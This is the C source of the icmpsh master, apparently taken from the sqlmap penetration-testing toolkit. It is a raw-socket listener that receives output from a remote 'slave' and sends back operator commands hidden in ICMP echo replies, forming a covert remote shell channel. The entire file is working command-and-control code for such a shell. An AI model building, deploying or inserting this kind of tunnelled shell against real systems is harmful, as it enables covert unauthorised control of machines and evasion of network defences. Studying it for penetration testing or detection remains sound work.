sqlmapproject
GitHub Repository: sqlmapproject/sqlmap
Path: blob/master/extra/icmpsh/icmpsh-m.c
/*
* icmpsh - simple icmp command shell
* Copyright (c) 2010, Nico Leidecker <[email protected]>
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <netinet/in.h>
#include <netinet/ip_icmp.h>
#include <netinet/ip.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#define IN_BUF_SIZE 1024
#define OUT_BUF_SIZE 64
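/*
 * Compute the 16-bit one's-complement checksum over a buffer.
 *
 * ptr    - start of the data to sum
 * nbytes - number of bytes to cover; a trailing odd byte is summed as the
 *          first byte of a 16-bit word whose second byte is zero
 *
 * Returns the complement of the folded sum. Words are read in host memory
 * order. A count of zero or less yields 0xffff.
 *
 * Words are fetched with memcpy() rather than by dereferencing ptr: the
 * caller in this file passes a cast pointer into a char receive buffer,
 * which carries no alignment guarantee for unsigned short.
 */
unsigned short checksum(unsigned short *ptr, int nbytes)
{
    const unsigned char *p = (const unsigned char *) ptr;
    unsigned long sum = 0;
    unsigned short word;

    while (nbytes > 1) {
        memcpy(&word, p, sizeof(word));
        sum += word;
        p += sizeof(word);
        nbytes -= 2;
    }

    if (nbytes == 1) {
        // pad the last byte with a zero byte before adding it
        word = 0;
        memcpy(&word, p, 1);
        sum += word;
    }

    // fold the carries back into the low 16 bits, then complement
    sum = (sum >> 16) + (sum & 0xffff);
    sum += (sum >> 16);
    return (unsigned short) ~sum;
}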
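/*
 * icmpsh master: answers ICMP packets arriving on a raw socket and carries
 * whatever is pending on stdin back in the payload of each reply.
 *
 * Each received payload is printed to stdout. Up to OUT_BUF_SIZE bytes read
 * from stdin are placed behind the reused ICMP header, and the reply is sent
 * to the source address of the packet being answered.
 *
 * Returns -1 if the raw socket cannot be created, stdin cannot be switched
 * to non-blocking mode, or sendto() fails. The receive loop has no other
 * exit.
 *
 * NOTE(review): neither the ICMP type nor the peer address is checked, so the
 * payload of any ICMP packet delivered to this socket is written to the
 * terminal as-is (control sequences included) and is answered. Opening a raw
 * socket normally needs root or CAP_NET_RAW on Linux.
 */
int main(int argc, char **argv)
{
    int sockfd;
    int flags;
    char in_buf[IN_BUF_SIZE];
    char out_buf[OUT_BUF_SIZE];
    unsigned int out_size;
    int nbytes;
    size_t ip_hlen;
    struct iphdr *ip;
    struct icmphdr *icmp;
    char *data;
    struct sockaddr_in addr;

    printf("icmpsh - master\n");

    // create raw ICMP socket
    sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_ICMP);
    if (sockfd == -1) {
        perror("socket");
        return -1;
    }

    // set stdin to non-blocking so building a reply never waits for input;
    // a failed F_GETFL must not be OR-ed into the flag word
    flags = fcntl(0, F_GETFL, 0);
    if (flags == -1 || fcntl(0, F_SETFL, flags | O_NONBLOCK) == -1) {
        perror("fcntl");
        close(sockfd);
        return -1;
    }

    printf("running...\n");
    while (1) {

        // read one packet; the code below expects it to start with the IP header
        memset(in_buf, 0x00, IN_BUF_SIZE);
        nbytes = read(sockfd, in_buf, IN_BUF_SIZE - 1);
        if (nbytes <= 0) {
            continue;
        }

        // the fixed part of the IP header must be present before it is read
        if ((size_t) nbytes < sizeof(struct iphdr)) {
            continue;
        }
        ip = (struct iphdr *) in_buf;

        // honour the header length field: IP options shift the ICMP header
        ip_hlen = (size_t) ip->ihl * 4;
        if (ip_hlen < sizeof(struct iphdr) ||
            (size_t) nbytes < ip_hlen + sizeof(struct icmphdr)) {
            // malformed or truncated packet: nothing to reuse for a reply
            continue;
        }

        icmp = (struct icmphdr *) (in_buf + ip_hlen);
        data = (char *) (icmp + 1);
        nbytes -= (int) (ip_hlen + sizeof(struct icmphdr));

        if (nbytes > 0) {
            // at most IN_BUF_SIZE - 1 bytes were read, so the terminator
            // always lands inside in_buf
            data[nbytes] = '\0';
            printf("%s", data);
            fflush(stdout);
        }

        // reuse headers: only the type is rewritten (0), the other header
        // fields go back as received
        icmp->type = 0;

        // zero the whole address so sin_port and the padding are not
        // uninitialised stack bytes when handed to sendto()
        memset(&addr, 0, sizeof(addr));
        addr.sin_family = AF_INET;
        addr.sin_addr.s_addr = ip->saddr;

        // read data from stdin; -1 (nothing pending) or 0 gives an empty reply
        nbytes = read(0, out_buf, OUT_BUF_SIZE);
        if (nbytes > 0) {
            memcpy(data, out_buf, (size_t) nbytes);
            out_size = (unsigned int) nbytes;
        } else {
            out_size = 0;
        }

        // the checksum field must be zero while the checksum is computed
        icmp->checksum = 0x00;
        icmp->checksum = checksum((unsigned short *) icmp, sizeof(struct icmphdr) + out_size);

        // send reply
        nbytes = sendto(sockfd, icmp, sizeof(struct icmphdr) + out_size, 0, (struct sockaddr *) &addr, sizeof(addr));
        if (nbytes == -1) {
            perror("sendto");
            close(sockfd);
            return -1;
        }
    }

    return 0;
}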